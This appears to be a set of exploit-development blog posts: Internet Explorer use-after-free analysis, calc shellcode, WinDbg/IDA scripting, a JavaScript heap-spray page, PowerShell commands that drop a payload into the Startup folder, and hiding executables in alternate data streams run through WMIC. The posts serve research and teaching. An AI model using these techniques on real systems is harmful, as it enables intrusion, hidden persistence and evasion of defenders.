    6d58595a 8b0b            mov     ecx,dword ptr [ebx]
    6d58595c e89f6afdff      call    mshtml!CElement::Doc (6d55c400)
    mshtml!CElement::Doc:
    6d55c400 8b01            mov     eax,dword ptr [ecx]
    6d55c402 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:00000070=????????
    6d55c405 ffd2            call    edx

    This is a classic C++ use-after-free vulnerability. IE is trying to call a function within a previously freed object's virtual function table. In the disassembly above, a pointer to some object [EBX] has a pointer to its virtual function table [ECX] that subsequently calls a function at offset 0x70 in its vftable [EAX+0x70].

    What we need to find out is what type of object was freed and how many bytes get allocated for that object. That way, we can craft fake objects of that size (using javascript) whose vftable entry at offset 0x70 points to our shellcode.

    Since mshtml!CTreeNode::ComputeFormats+0x42 points to the object in question (in EBX), I set a breakpoint in Windbg on that instruction and got the following:
    As can be seen above, EBX points to a freed CObjectElement object. How can we know for sure that the object was freed and that it points to a CObjectElement object? Enabling the page heap and user stack traces of every call to malloc and free will do the trick. This technique also allows us to observe the size allocated to CObjectElement.
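
    For reference, page heap and user stack traces can be enabled with gflags from the Debugging Tools for Windows. Something along these lines should do it (a sketch, assuming iexplore.exe is the process under test):

    C:\>gflags.exe /i iexplore.exe +hpa +ust
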
    The size that gets allocated to the CObjectElement object is 0xE0. It is also handy to see the call stacks of what allocated and freed the object. The size allocated for the object was determined via dynamic analysis. There's more than one way to skin a cat though. The same information can be gleaned via static analysis. A brief glance of the mshtml!CObjectElement::CreateElement function (which was called in the call stack above) in IDA shows that 0xE0 bytes is allocated for CObjectElement.


    According to the disassembly (for CObjectElement::CObjectElement), the actual size of the class is 0xDC. However, 0xE0 is allocated on the heap because the allocation size is rounded up to the nearest 8-byte boundary.


    Lastly, although it is not always necessary for exploitation, let's determine the actual function that should have been called at the time of the crash. This can be accomplished several ways in Windbg.
    The function that should have been called was mshtml!CElement::SecurityContext.

    So to refresh our memories, what was needed to begin exploiting a use-after-free bug?

    1) The type of object referenced after being freed
    2) The size allocated to the object

    There is no magic command that will give you this information and as usual, there is always more than one way to obtain it. The key is to understand what led to the crash. The next step is to utilize javascript to declare string variables that will allocate fake objects in the heap that point to attacker controlled shellcode (via heap spraying). This can be accomplished reliably without needing to point to a typical address like 0x0C0C0C0C which serves as both an address in the heap and a NOP slide. More on that in a future blog post...

    References:

    1. N. Johnson, "Insecticides don't kill bugs, Patch Tuesdays do,"
    June 16, 2011, http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html

    Cool kids pop a programmer's calc in their demos

    Over time, I've heard several well-respected security professionals mention that you're not really cool unless you can pop a scientific/programmer's calculator when demoing your exploits. I mean, what right does a standard, run of the mill calculator have showing its face to a crowd of enthralled conference attendees watching the latest version of Windows 7 get totally pwned? And how many self-respecting security folks use a standard calc more than the programmer's calc? So rather than waste the time of the people who thought this would be cool, I thought it would be better to waste my own time to complete this silly challenge. So without further ado, prepare to do some hexadecimal math. I'd like to mention that Jacob Appelbaum (@ioerror) and Aaron Portnoy (@aaronportnoy) inspired me to write this. ;D

    To start, I used procmon to observe how calc was interacting with the OS when switching from standard to programmer's mode.


    It turns out that it modifies the following registry key: HKCU\Software\Microsoft\Calc\layout and changes the REG_DWORD value to 0x00000002 when switching to a programmer's calc.
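
    Incidentally, the same change can be made trivially from PowerShell - a quick way to validate the effect before writing any assembly (per the procmon capture above, a layout value of 2 selects the programmer's calc):

    PS > Set-ItemProperty -Path HKCU:\Software\Microsoft\Calc -Name layout -Value 2 -Type DWord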

    One of the nice features of procmon is that it lets you view the stack trace of each entry. Here's the stack trace for the call to RegSetValue:


    So, to get my shellcode to work, I'll likely need to understand how calc.exe modifies the registry. After loading calc.exe into IDA, I quickly determined that it calls the following functions, which procmon graciously gave me the offsets to:

    • RegCreateKeyExW
    • RegSetValueExW
    • RegCloseKey

    IDA in conjunction with my debugger conveniently gave me all the parameters I needed to pass to these functions. For more information on the function parameters, refer to MSDN documentation.

    The only problem is that the shellcode needs to first determine the addresses to these functions, which turns out to be the bulk of my shellcode. I should be careful when saying 'my' shellcode considering I modified SkyLined's awesome w32-exec-calc-shellcode[1] which I believe was loosely based upon Matt Miller's paper - "Understanding Windows Shellcode[2]."

    It's worth noting that if your shellcode is running in the stack, careful considerations must be made when writing your assembly. Specifically, the shellcode instructions and function parameters share the same space. Because you are executing code from the stack, you have to be careful not to clobber your instructions. So what I did was move esp (which would point to the first instruction) into ebp [MOV EBP, ESP] and essentially create my own stack frame above the code.

    Here is the shellcode with relevant comments for your convenience. Note that this will only work on 32-bit Windows and it has only been tested on Windows 7 SP1 :

    w32-programmer-calc hex
    w32-programmer-calc assembly

    Areas of improvement:
    • Remove all nulls. This would be relatively easy but I am lazy. Perhaps in a future version.
    • Only one byte of this needs to be modified to pop a scientific calc on Vista. This can be left as an exercise for the readers.
    • This could scan for the OS version and determine dynamically whether to pop a scientific (pre-Windows 7) vs programmer's calc. Do you really want to be popping calcs on anything besides Windows 7 though? ;D
    • My assembly is likely total crap. But it works. I'm sure someone out there could trim a couple dozen bytes off it but I'll leave that as a challenge for the assembly ninjas out there.

    Please comment, try it out on your 32-bit Windows 7 machine for yourself, and let me know if it doesn't work and I might make an effort to fix it. Enjoy!

    References:

    1. Berend-Jan "SkyLined" Wever, w32-exec-calc-shellcode, http://code.google.com/p/w32-exec-calc-shellcode/

    2. Matt Miller, "Understanding Windows Shellcode", December 6, 2003, http://www.hick.org/code/skape/papers/win32-shellcode.pdf

    Integrating WinDbg and IDA for Improved Code Flow Analysis

    IDA is hands down the best tool for static analysis. Its debugger, on the other hand, is certainly lacking when compared to the power of WinDbg, IMHO. As such, I find myself wasting too much time switching between windows and manually highlighting and commenting instructions in IDA as I trace through them in WinDbg. Fortunately, the power of IDApython can be unleashed to reduce this tedium.

    I was reading an older TippingPoint MindshaRE article from Cody Pierce entitled “Hit Tracing in WinDbg[1]” and was inspired by his ideas to implement my own IDApython script to better integrate WinDbg with IDA. While I may be recreating many of his efforts, my primary intent was to get better at scripting in IDApython while improving upon my static/dynamic analysis workflow.

    The purpose of my script is to parse WinDbg log files for module base addresses, instruction addresses, references to register values, and pointer dereferences. Then, for every instruction you hit in your debug session, the corresponding instructions will be colored and commented accordingly and in a module base address-agnostic fashion.

    To get started, your WinDbg log file will need to display the following:

    • Disassembly of current instruction
    • Effective address for current instruction
    • Register state
    • Listing of loaded modules (optional, but highly recommended)

    The first three items should be enabled by default but can be re-enabled with the ‘.prompt_allow’ command. Your output should look like the following:

    eax=003762f8 ebx=006cc278 ecx=00000004 edx=00000000 esi=006cc420 edi=00000001
    eip=00491469 esp=0020e348 ebp=0020e388 iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
    calc!CCalcEngine::DoOperation+0x6be:
    00491469 e8074efeff      call    calc!divrat (00476275)

    The reason it is ideal to include module base addresses in your log file is so that effective addresses can be calculated as offsets then added to the base address of the module in IDA. This helps because the module base address in WinDbg is often different than the base address in IDA. Also, this avoids having to modify the dumpfile to match IDA or rebase the addresses in IDA – both, a pain and unnecessary. My script parses the output of ‘lmp’ in WinDbg which outputs the base addresses of loaded modules minus symbol information.
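
    As a quick illustration of that offset calculation, WinDbg's expression evaluator resolves a module name to its base address, so an instruction's module-relative offset can be computed directly (using an address from the upcoming session as a hypothetical example):

    0:000> ? 00495001 - calc

    The resulting offset is what my script adds to the module's image base in IDA.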

    To continue riding Cody’s coattails, I’ll be analyzing the DoOperation function (0x00495001-0x00495051) in calc.exe as he did. I determined the beginning and ending addresses of the function with the following commands:

    0:000> X calc!*DoOperation*
    00495001 calc!CCalcEngine::DoOperation =
    0:000> BP 00495001
    0:000> g

    Entering 1000 / 4 in calc

    Breakpoint 0 hit
    eax=00439220 ebx=0069c420 ecx=0069c278 edx=00000000 esi=0069c278 edi=00000000
    eip=00495001 esp=0032e95c ebp=0032ea4c iopl=0 nv up ei pl nz na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
    calc!CCalcEngine::DoOperation:
    00495001 6a1c push 1Ch

    Step through function until return instruction

    0:000> PT
    eax=00000000 ebx=0069c420 ecx=00495051 edx=00445310 esi=0069c278 edi=00000000
    eip=00495051 esp=0032e95c ebp=0032ea4c iopl=0 nv up ei pl zr na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
    calc!CCalcEngine::DoOperation+0xfa:
    00495051 c20c00 ret 0Ch
    0:000> g
    0:004> .logopen "calc.log"

    The following dump is the result of the operation 1000/4 in the function without stepping into calls (using the PA command):


    Obviously, manually annotating all of this information in IDA is the work of an unpaid intern. I, on the other hand, value my time and wrote the following script to parse out the log file and import it into IDA:


    The script has the following features:

    • Prompts user for WinDbg log file to load
    • Prompts user for the instruction highlight color (real men use pink) ;P
    • Parses the output of the ‘lmp’ command and calculates instruction offsets from the module base address
    • Creates comments for the values of referenced registers
    • Creates comments for the value of pointer dereferences

    Here is what the graph of DoOperation looks like before 1000 / 4 is performed:


    Here is what the graph of DoOperation looks like after 1000 / 4 is performed:


    You can see the highlighted instructions and the values of any referenced registers and pointers.


    Hopefully, by now you can see the power of IDApython in improving your analysis workflow. If you use this script, I welcome your feedback!

    References:

    1. Cody Pierce, “MindshaRE: Hit Tracing in WinDbg,” July 17, 2008, http://dvlabs.tippingpoint.com/blog/2008/07/17/mindshare-hit-tracing-in-windbg

    Targeted Heap Spraying – 0x0c0c0c0c is a Thing of the Past


    Traditionally, heap spraying has relied upon spraying with 0x0C0C0C0C followed by shellcode, which serves as both an address in the heap and a series of nops. This however is not extremely reliable. You have to be lucky enough not to land on a heap header or somewhere in the middle of your shellcode. Additionally, the latest version of EMET now prevents the execution of address 0x0C0C0C0C or any other arbitrary address specified in the registry. While this is a futile attempt to prevent heap spraying, it does require another method to reliably execute shellcode in the heap. Fortunately, there is a method that allows you to reliably allocate shellcode that is both in a predictable location and memory page-aligned (64K-aligned).

    It turns out that javascript allocations of at least 512K are serviced by VirtualAlloc, which returns addresses that are page aligned (i.e. in the form of 0xXXXX0000). I credit Alexander Sotirov with this discovery as I learned this technique from him. There are many ways to place shellcode in the heap but string allocations are the tried and true heap allocation primitive in javascript. The format of a javascript string on the heap is as follows:

    [string length - 4 bytes][Unicode encoded string][\x00\x00]

    The following diagram illustrates a string’s layout in memory:
     
    Therefore, any javascript string will be 6 bytes long plus the length of the Unicode encoded string. Also, the heap header for chunks allocated with VirtualAlloc is 0x20 bytes in length. As a result, shellcode allocated through VirtualAlloc will always reside at offset 0x24 (the 0x20-byte header plus the 4-byte string length field). Also, because each allocation results in a 64K-aligned address, we can make a series of string allocations that each equal exactly 64K. That way, the start of our shellcode will always be located at an address of the form 0xXXXX0024.

    The following javascript code takes advantage of these concepts by building a one megabyte string out of sixteen 64K chunks. Note that the sixteenth chunk accounts for the size of the heap header and string length so that exactly one megabyte gets allocated. The resultant string is then allocated one hundred times, resulting in an allocation of exactly 100MB.

    <html>
    <head>
    <script>
    function heapspray() {
        // Each \u4141 character occupies the bytes 41 41 in memory.
        var shellcode = "\u4141";

        // Double the string until it is at least 100,000 characters long.
        while (shellcode.length < 100000)
            shellcode = shellcode + shellcode;

        // Each chunk is 32,768 UTF-16 characters - i.e. 64KB of string data.
        var onemeg = shellcode.substr(0, 64*1024/2);

        for (i=0; i<14; i++) {
            onemeg += shellcode.substr(0, 64*1024/2);
        }

        // The 16th chunk is 19 characters (38 bytes) short: 0x20-byte heap
        // header + 4-byte length field + 2-byte null terminator = 0x26 (38)
        // bytes, making the total allocation exactly 1MB.
        onemeg += shellcode.substr(0, (64*1024/2)-(38/2));

        var spray = new Array();

        // Allocate the 1MB string 100 times for a 100MB spray.
        for (i=0; i<100; i++) {
            spray[i] = onemeg.substr(0, onemeg.length);
        }
    }
    </script>
    </head>
    <body>
    <input type="button" value="Spray the heap" onclick="heapspray()"></input>
    </body>
    </html>

    Run the javascript code above and follow along with the following analysis in WinDbg. Start by viewing the addresses of the heaps in Internet Explorer:

    !heap -stat

    _HEAP 00360000
         Segments            00000001
             Reserved  bytes 00100000
             Committed bytes 000f1000
         VirtAllocBlocks     00000001
             VirtAlloc bytes 035f0000
    _HEAP 035b0000
         Segments            00000001
             Reserved  bytes 00040000
             Committed bytes 00019000
         VirtAllocBlocks     00000000
             VirtAlloc bytes 00000000
    _HEAP 00750000
         Segments            00000001
             Reserved  bytes 00040000
             Committed bytes 00012000
         VirtAllocBlocks     00000000
             VirtAlloc bytes 00000000
    _HEAP 00270000
         Segments            00000001
             Reserved  bytes 00010000
             Committed bytes 00010000
         VirtAllocBlocks     00000000
             VirtAlloc bytes 00000000
    _HEAP 02e20000
         Segments            00000001
             Reserved  bytes 00040000
             Committed bytes 00001000
         VirtAllocBlocks     00000000
             VirtAlloc bytes 00000000
    _HEAP 00010000
         Segments            00000001
             Reserved  bytes 00010000
             Committed bytes 00001000
         VirtAllocBlocks     00000000
             VirtAlloc bytes 00000000

    Look at the “VirtAlloc bytes” field for a heap with a large allocation. The heap address we’re interested in is the first one – “_HEAP 00360000”

    Next, view the allocation statistics for that heap handle:

    !heap -stat -h 00360000

     heap @ 00360000
    group-by: TOTSIZE max-display: 20
        size     #blocks     total     ( %) (percent of total busy bytes)
        fffe0 65 - 64ff360  (99.12)
        40010 1 - 40010  (0.25)
        1034 10 - 10340  (0.06)
        20 356 - 6ac0  (0.03)
        494 16 - 64b8  (0.02)
        5ba0 1 - 5ba0  (0.02)
        5e4 b - 40cc  (0.02)
        4010 1 - 4010  (0.02)
        3980 1 - 3980  (0.01)
        d0 3e - 3260  (0.01)
        460 b - 3020  (0.01)
        1800 2 - 3000  (0.01)
        800 6 - 3000  (0.01)
        468 a - 2c10  (0.01)
        2890 1 - 2890  (0.01)
        78 52 - 2670  (0.01)
        10 215 - 2150  (0.01)
        1080 2 - 2100  (0.01)
        2b0 c - 2040  (0.01)
        2010 1 - 2010  (0.01)

    Our neat and tidy allocations really stand out here. There are exactly 0x65 (101 decimal) allocations of size 0xfffe0 (1MB minus the 0x20-byte heap header).

    A nice feature of WinDbg is that you can view heap chunks of a particular size. The following command lists all the heap chunks of size 0xfffe0.

    !heap -flt s fffe0

        _HEAP @ 360000
          HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
            037f0018 1fffc fffc  [00]   037f0020    fffe0 - (busy VirtualAlloc)
            038f0018 1fffc fffc  [00]   038f0020    fffe0 - (busy VirtualAlloc)
            039f0018 1fffc fffc  [00]   039f0020    fffe0 - (busy VirtualAlloc)
            03af0018 1fffc fffc  [00]   03af0020    fffe0 - (busy VirtualAlloc)
            03bf0018 1fffc fffc  [00]   03bf0020    fffe0 - (busy VirtualAlloc)
            05e80018 1fffc fffc  [00]   05e80020    fffe0 - (busy VirtualAlloc)
            05f80018 1fffc fffc  [00]   05f80020    fffe0 - (busy VirtualAlloc)
            06080018 1fffc fffc  [00]   06080020    fffe0 - (busy VirtualAlloc)
            06180018 1fffc fffc  [00]   06180020    fffe0 - (busy VirtualAlloc)
           
            0aa80018 1fffc fffc  [00]   0aa80020    fffe0 - (busy VirtualAlloc)
            0ab80018 1fffc fffc  [00]   0ab80020    fffe0 - (busy VirtualAlloc)
            0ac80018 1fffc fffc  [00]   0ac80020    fffe0 - (busy VirtualAlloc)
            0ad80018 1fffc fffc  [00]   0ad80020    fffe0 - (busy VirtualAlloc)
            0ae80018 1fffc fffc  [00]   0ae80020    fffe0 - (busy VirtualAlloc)
            0af80018 1fffc fffc  [00]   0af80020    fffe0 - (busy VirtualAlloc)
            0b080018 1fffc fffc  [00]   0b080020    fffe0 - (busy VirtualAlloc)
            0b180018 1fffc fffc  [00]   0b180020    fffe0 - (busy VirtualAlloc)
            0b280018 1fffc fffc  [00]   0b280020    fffe0 - (busy VirtualAlloc)
            0b380018 1fffc fffc  [00]   0b380020    fffe0 - (busy VirtualAlloc)
        _HEAP @ 10000
        _HEAP @ 270000
        _HEAP @ 750000
        _HEAP @ 2e20000
        _HEAP @ 35b0000

    Note how the allocations land at sequential addresses.

    Now that we have the addresses of each heap chunk we can start to inspect memory for our 0x41’s:

    0:007> db 06b80000
    06b80000  00 00 c8 06 00 00 a8 06-00 00 00 00 00 00 00 00  ................
    06b80010  00 00 10 00 00 00 10 00-61 65 15 29 00 00 00 04  ........ae.)....
    06b80020  da ff 0f 00 41 41 41 41-41 41 41 41 41 41 41 41  ....AAAAAAAAAAAA
    06b80030  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    06b80040  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    06b80050  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    06b80060  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    06b80070  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

    You can clearly see the string length at offset 0x20 – 000fffda which is the length of the string minus the null terminator.

    Another way to analyze your heap allocations is through the fragmentation view of VMMap - one of many incredibly useful tools in the Sysinternals suite. The following image shows an allocation of 1000MB. Within the fragmentation view you can zoom in and click on individual allocations and confirm that each heap allocation (in orange) begins at an address in the form of 0xXXXX0000.


    So why is this technique so useful? This method of heap spraying is perfect when exploiting use-after-free vulnerabilities where an attacker can craft fake objects and vtable structures. A fake vtable pointer can then point to an address in the heap range – 0x11F50024 just as an example. Thus, there is no need to rely upon nops and no need to worry about EMET’s arbitrary prevention of executing 0x0C0C0C0C-style addresses. For all intents and purposes, you’ve completely bypassed ASLR protections.

    Dropping Executables with Powershell

    Scenario: You find yourself in a limited Windows user environment without the ability to transfer binary files over the network for one reason or another. This rules out using a browser, ftp.exe, mspaint (yes, mspaint can be used to transfer binaries), etc. for file transfer. Suppose this workstation isn't even connected to the Internet. What existing options do you have to drop binaries on the target machine? There's the tried and true debug.exe method of assembling a text file with your payload. This method limits the size of your executable to 64K however, since debug.exe is a 16-bit application, and Microsoft has since removed debug from recent versions of Windows. Didier Stevens showed how easy it is to embed executables in PDFs[1], and you can convert executables to VBscript and embed them in Office documents as well, but those apps won't necessarily be installed on every machine. Fortunately, starting with Windows 7 and Server 2008, Powershell is installed by default.

    Because Powershell implements the .NET framework, you have an incredible amount of power at your fingertips. I will demonstrate one use case whereby you can create an executable from a text file consisting of a hexadecimal representation of an executable. You can generate this text file using any compiled/scripting language you wish but since we're on the topic, I'll show you how to generate it in Powershell:

    PS > [byte[]] $hex = get-content -encoding byte -path C:\temp\evil_payload.exe
    PS > [System.IO.File]::WriteAllLines("C:\temp\hexdump.txt", ([string]$hex))

    The first line reads in each byte of an executable and saves them to a byte array. The second line casts the bytes in the array as strings and writes them to a text file. The resultant text file will look something like this:

    77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 0 124 58 138 68 29 84 217 68 29 84 217 68 29 84 217 99 219 41 217 66 29 84 217 99 219 47 217 79 29 84 217 68 29 85 217 189 29 84 217 99 219 58 217 71 29 84 217 99 219 57 217 125 29 84 217 99 219 40 217 69 29 84 217 99 219 44 217 69 29 84 217 82 105 99 104 68 29 84 217 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ...

    You can see that each byte is represented as a decimal (77,90 = "MZ").

    Next, once you get the text file onto the target machine (a teensy/USB HID device would be an ideal use case), Powershell can be used to reconstruct the executable from the text file using the following lines:

    PS > [string]$hex = get-content -path C:\Users\victim\Desktop\hexdump.txt
    PS > [Byte[]] $temp = $hex -split ' '
    PS > [System.IO.File]::WriteAllBytes("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\evil_payload.exe", $temp)

    The first line reads the hex dump into a string variable. The string is then split into a byte array using <space> as a delimiter. Finally, the byte array is written back to a file and thus, the original executable is recreated.

    While writing this article, I stumbled upon Dave Kennedy and Josh Kelley's work with Powershell[2], where they arrived at this same method of generating executables. In fact, several Metasploit payloads use a similar, albeit slicker method of accomplishing this using compression and base64 encoding. Please do check out the great work they've been doing with Powershell.
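
    To illustrate the general idea behind that slicker approach (just a sketch, not Metasploit's actual implementation), the encoding side might look like this:

    PS > $bytes = [IO.File]::ReadAllBytes('C:\temp\evil_payload.exe')
    PS > $ms = New-Object IO.MemoryStream
    PS > $ds = New-Object IO.Compression.DeflateStream($ms, [IO.Compression.CompressionMode]::Compress)
    PS > $ds.Write($bytes, 0, $bytes.Length); $ds.Close()
    PS > [Convert]::ToBase64String($ms.ToArray()) | Out-File C:\temp\encoded.txt

    The receiving side simply reverses the process: [Convert]::FromBase64String, a DeflateStream in Decompress mode, and [System.IO.File]::WriteAllBytes to reconstitute the executable.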

    1. Didier Stevens, "Embedding and Hiding Files in PDF Documents," July 1, 2009, http://blog.didierstevens.com/2009/07/01/embedding-and-hiding-files-in-pdf-documents/

    2. Dave Kennedy and Josh Kelley "Defcon 18 PowerShell OMFG…", August 31, 2010, http://www.secmaniac.com/august-2010/powershell_omfg/

    Stealth Alternate Data Streams and Other ADS Weirdness

    I was reading an article on MSDN regarding the naming of files, paths, and namespaces[1] and I discovered some interesting peculiarities regarding the naming and creation of certain files containing alternate data streams.

    I started by playing around with naming files based upon reserved device names "CON, PRN, AUX, NUL, COM1, LPT1, etc." As an example:

    C:\temp>echo hi > \\?\C:\temp\NUL

    Note that this file can only be created when the path is prefixed with "\\?\" or "\\.\GLOBALROOT\Device\HarddiskVolume[n]\". Subsequently, this is also the only way to delete the file.

    This technique has been known about for over a year now and is well documented[2][3].

    What I found to be interesting is that when you create an alternate data stream attached to a file named after any reserved device name, the alternate data stream is invisible to both 'dir /R' and streams.exe unless you prepend the "\\?\" prefix to the path. Also, if the ADS happens to be an executable, it can be executed using WMIC. As an example:

    C:\temp>type C:\Windows\System32\cmd.exe > \\?\C:\temp\NUL:hidden_ADS.exe

    C:\temp>dir /r C:\temp

     Directory of C:\temp

    09/17/2011  06:35 AM    <DIR>          .
    09/17/2011  06:35 AM    <DIR>          ..
    09/17/2011  06:37 AM                 5 NUL
                   1 File(s)              5 bytes

    C:\temp>streams C:\temp

    Streams v1.56 - Enumerate alternate NTFS data streams
    Copyright (C) 1999-2007 Mark Russinovich
    Sysinternals - www.sysinternals.com

    No files with streams found.

    C:\temp>wmic process call create \\?\C:\temp\NUL:hidden_ADS.exe
    Executing (Win32_Process)->Create()
    Method execution successful.
    Out Parameters:
    instance of __PARAMETERS
    {
            ProcessId = 1620;
            ReturnValue = 0;
    };


    So what are the implications of this?

    1) You have a file that's nearly impossible to delete unless you know to append '\\?\'
    2) You can hide malicious files/executables within the device name file in an ADS that is undetectable using traditional tools (though see the PowerShell note after this list).
    3) If an executable is hidden in the invisible ADS, it can be executed via WMIC.
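
    As an aside, newer versions of PowerShell (3.0 and later) can enumerate alternate data streams natively via the -Stream parameter, which may fare better than dir /R or streams.exe in some cases (untested against the device name trick above):

    PS > Get-Item -LiteralPath C:\temp\test.txt -Stream *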

    As an added comment, according to the same MSDN article, characters "whose integer representations are in the range from 1 through 31" are not allowed in file names, "except for alternate data streams where these characters are allowed." This would allow someone to create an ADS using alt-characters. As an example:

    C:\temp>echo hi > C:\temp\test.txt

    C:\temp>echo secret text > C:\temp\test.txt:^G^G^G

    C:\temp>dir /R C:\temp

     Directory of C:\temp

    09/17/2011  07:09 AM    <DIR>          .
    09/17/2011  07:09 AM    <DIR>          ..
    09/17/2011  07:08 AM                 5 test.txt
                                        14 test.txt::$DATA
                   1 File(s)              5 bytes

    C:\temp>more < C:\temp\test.txt:^G^G^G
    secret text

    The ADS is named after three system bell characters <ALT+007>. Therefore, nothing is printed but a directory listing would yield three audible beeps. Hehe. Nothing mind-blowing but just another way to mess with admins or incident handlers.


    Happy ADS created using <ALT-002>

    The bottom line: these techniques would both serve as a good malware persistence mechanism and frustrate any incident handler.

    1. Microsoft, "Naming Files, Paths, and Namespaces", http://msdn.microsoft.com/en-us/library/aa365247(VS.85).aspx

    2. Dan Crowley, "Windows File Pseudonyms," April 2010, http://www.sourceconference.com/publications/bos10pubs/Windows%20File%20Pseudonyms.pptx

    3. Mark Baggett, "NOT A CON!!!! (it's a backdoor)," February, 15 2010, http://pauldotcom.com/2010/02/deleting-the-undeleteable.html